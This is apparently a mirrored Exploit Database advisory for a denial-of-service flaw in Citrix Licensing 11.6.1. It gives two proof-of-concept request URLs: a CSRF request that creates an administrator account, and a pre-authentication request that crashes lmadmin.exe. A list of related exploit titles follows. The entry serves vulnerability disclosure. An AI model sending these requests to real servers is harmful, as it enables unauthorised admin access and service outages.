Citrix 11.6.1 – Licensing Administration Console Denial of Service

Exploit Database
12 阅读

作者： Rune

日期： 2012-03-15
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/36969/

source:https://www.securityfocus.com/bid/52522/info

Citrix Licensing is prone to a denial-of-service vulnerability.

A remote attacker can leverage this issue to crash the affected application, denying service to legitimate users.

Citrix Licensing 11.6.1 build 10007 is vulnerable; other versions may also be affected. 

Proof-of-Concept:
http://www.example.com/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save(Administrator CSRF)

http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe)

last Exploits
Citrix 11.6.1 – Licensing Administration Console Denial of Service的更多信息

VSAXESS V2.6.2.70 build20171226_053 – ‘organization’ Denial of Service (PoC)：
Multiple Browsers – ‘history.go()’ Denial of Service：
Symantec RAR Decomposer Engine (Multiple Products) – Out-of-Bounds Read / Out-of-Bounds Write：
libquicktime 1.2.4 – Integer Overflow：
WebKit JSC – ‘arrayProtoFuncSplice’ Uninitialized Memory Reference：
Nokia N97 – ‘.m3u’ Playlist Crash (PoC)：
Adobe Flash – YUVPlane Decoding Heap Overflow：
RCA DCM425 Cable Modem – ‘micro_httpd’ Denial of Service (PoC)：